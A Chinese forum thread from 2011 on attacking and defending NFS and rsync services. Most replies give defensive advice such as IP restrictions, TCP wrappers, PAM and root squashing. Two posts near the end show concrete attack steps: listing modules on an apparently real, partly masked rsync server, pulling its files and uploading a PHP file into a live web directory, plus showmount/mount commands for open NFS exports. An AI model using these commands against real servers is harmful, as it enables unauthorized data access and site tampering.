免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
楼主: cnbird
打印 上一主题 下一主题

专家座谈——NFS,RSYNC攻击方式揭秘以及防御手段 [复制链接]

论坛徽章:
0
21 [报告]
发表于 2011-11-03 14:31 |只看该作者
我发的帖子被删除了?

论坛徽章:
0
22 [报告]
发表于 2011-11-04 00:14 |只看该作者
安全防护是一个整体吧,只谈IP限制,那安全意义就不大了
king_819 发表于 2011-11-03 10:21



整体的话应该从哪些方面入手呢?当然了,服务器上面做访问限制(IP,帐号等),然后是管理员自身的安全意识,物理机器的安全防护,还有呢?

我属于纸上谈兵类型的,对于NFS没有实际运用过,rsync虽然用的比较多,但是研究也不是非常深。就从服务器上面做访问限制来说吧。
网络层用iptables 限制只有特定的客户端才可以访问,以及可以访问的端口
传输层再用tcp wrappers给限制一下
最后还可以再用pam在应用层再限制一次。。。
还有就是NFS和rsync本身来做访问控制


NFS涉及到用户权限的问题,一般应该要压制root,不然太危险了。

黑客即便进了获得了内网主机的访问权限,如果还有密码来限制的话,他还是访问不了NFS或者rsync服务器。

论坛徽章:
1
2015年辞旧岁徽章
日期:2015-03-03 16:54:15
23 [报告]
发表于 2011-11-04 00:50 |只看该作者
这个好,支持。

论坛徽章:
0
24 [报告]
发表于 2011-11-04 09:22 |只看该作者
说的这些好像都是很基础似的,怎么专家都不出来发言一下啊!

论坛徽章:
1
2015年辞旧岁徽章
日期:2015-03-03 16:54:15
25 [报告]
发表于 2011-11-05 20:13 |只看该作者
学习来了

论坛徽章:
0
26 [报告]
发表于 2011-11-05 20:47 |只看该作者
安全,看似光鲜,如果技术不牛工作不好找啊

论坛徽章:
10
CU大牛徽章
日期:2013-09-18 15:20:48程序设计版块每日发帖之星
日期:2016-07-21 06:20:00IT运维版块每日发帖之星
日期:2015-07-30 09:40:01技术图书徽章
日期:2014-10-14 16:00:43天蝎座
日期:2013-09-27 17:41:29CU大牛徽章
日期:2013-09-18 15:21:17CU大牛徽章
日期:2013-09-18 15:21:12CU大牛徽章
日期:2013-09-18 15:21:06CU大牛徽章
日期:2013-09-18 15:20:58每日论坛发贴之星
日期:2016-07-21 06:20:00
27 [报告]
发表于 2011-11-06 09:33 |只看该作者
对外网还是BASE HTTP相对安全一些。

现在对内的共享,我也只用cifs,普通用户和root使用选择多多

论坛徽章:
0
28 [报告]
发表于 2011-11-06 11:17 |只看该作者
支持,可惜来晚了
rsync一直用ssh密钥认证,iptables做ip限制

论坛徽章:
0
29 [报告]
发表于 2011-11-07 09:37 |只看该作者
1.查看rsync服务器上的列表
rsync 210.51.X.X::
finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book

看相应的下级目录(注意一定要在目录后面添加上/)


rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/

2.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt
成功上传
楼上就是实战的技巧

论坛徽章:
0
30 [报告]
发表于 2011-11-07 09:39 |只看该作者
nfs攻击方式:
showmount -e ip
mount ip:/共享目录 /mnt
就可以利用这样的漏洞了
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP